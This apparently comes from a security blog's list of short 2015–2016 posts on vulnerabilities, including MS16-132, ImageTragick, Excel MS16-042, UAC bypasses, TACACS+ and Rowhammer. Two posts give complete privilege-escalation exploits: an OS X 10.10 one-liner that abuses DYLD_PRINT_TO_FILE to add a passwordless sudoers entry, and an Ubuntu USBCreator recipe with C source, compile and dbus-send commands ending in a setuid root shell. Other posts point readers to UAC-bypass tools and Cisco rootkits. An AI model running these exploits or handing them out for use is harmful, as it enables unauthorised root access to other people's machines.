Microsoft Windows Animation Manager Memory Corruption Vulnerability (MS16-132) (CVE-2016-7205) + POC:

by admin

Wednesday, November 9th, 2016 at 11:21 am

A memory corruption vulnerability in the Microsoft Windows Animation Manager that allows a malicious user to remotely execute arbitrary code on a vulnerable user’s machine, in the context of the current user. JavaScript POC ::HERE::

Image Tragick CVE-2016-3714

by admin

Tuesday, May 3rd, 2016 at 10:45 pm

☑ Nickname
☑ Logo
☑ Hype
☑ Website
☐ POC

https://imagetragick.com/
An ImageMagick vulnerability reported today (CVE-2016-3714) allows uploaded images to trick the ImageMagick software into running commands instead, leading to a remote code execution (RCE) bug. More info ::HERE::

POC for MS16-042 Excel Heap Exploit

by admin

Thursday, April 14th, 2016 at 1:13 am

A new heap memory corruption (Out-of-Bounds Read) that affects Microsoft Office Excel 2007, 2010, 2013 and 2016. This vulnerability could allow remote code execution if a user opens a specially crafted Microsoft Office Excel file (.xlsm).
Advisory & POC

Windows 10 RS1 14316

by admin

Sunday, April 10th, 2016 at 3:44 pm

The build brings new changes targeting previously exploited DLL-hijacking and UAC-bypass methods.

cliconfg.exe – can no longer be used as a target for autoelevation, as MS changed its manifest to autoelevate=false.

mmc.exe – Event Viewer console fixed; DLL hijacking no longer works.

The fake IIS inetmgr.exe launch from the hardcoded inetsrv directory used by appinfo is fixed too – Windows will no longer run and autoelevate anything except the legitimate InetMgr.exe from the system32\inetsrv directory.

This defeats a lot of the methods used by UACMe, which is posted in my ::Wiki::

BypassUAC

by admin

Friday, January 29th, 2016 at 2:55 pm

Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoors https://github.com/xsysvermin/BypassUAC

UPDATE: apparently this was ripped from the original https://github.com/hfiref0x/UACME

TACACS+: Bypassing Cisco’s auth

by admin

Tuesday, November 24th, 2015 at 2:50 pm

3 methods to get into Terminal Access Controller Access-Control System Plus (TACACS+) http://agrrrdog.blogspot.ca

Here are some Cisco rootkits too 🙂 exploit-db.com

Red Hat userhelper vulnerability

by admin

Thursday, July 23rd, 2015 at 9:35 pm

Two security vulnerabilities were found in the userhelper utility (part of the usermode package) and the libuser library. Authenticated local users with shell access could combine these vulnerabilities to achieve local privilege escalation to the root user, since they let users change /etc/passwd. These flaws have been assigned CVE-2015-3245 and CVE-2015-3246. The info was released as soon as the patch was, so better hurry and patch 🙂 Src: http://seclists.org/oss-sec/2015/q3/186

Root Privs on OS X 10.10

by admin

Wednesday, July 22nd, 2015 at 5:17 pm

OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability: Affects OS X Yosemite v10.10, the latest stable release, and the beta version 10.10.5, so many people are affected by this. The flaw is in the environment variable DYLD_PRINT_TO_FILE that was added in Yosemite. It specifies where in the file system the dynamic linker (a component of the operating system) can log error messages, and it can be abused by an attacker to modify arbitrary files as root. You can escalate to root privileges by typing this in a terminal:

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

::MORE INFO HERE::

Priv Escalation in Ubuntu USBCreator service

by admin

Thursday, April 23rd, 2015 at 9:40 am

On Ubuntu and need to escalate to root and don’t have sudo?

$ cat > test.c
#include <unistd.h>    /* chown */
#include <sys/stat.h>  /* chmod */
/* runs when the library is loaded via LD_PRELOAD */
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id

::Source::

Hammer Time.

by admin

Monday, March 9th, 2015 at 2:36 pm

“Rowhammer” is a problem with some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows.
More info: Exploiting the DRAM rowhammer bug to gain kernel privileges
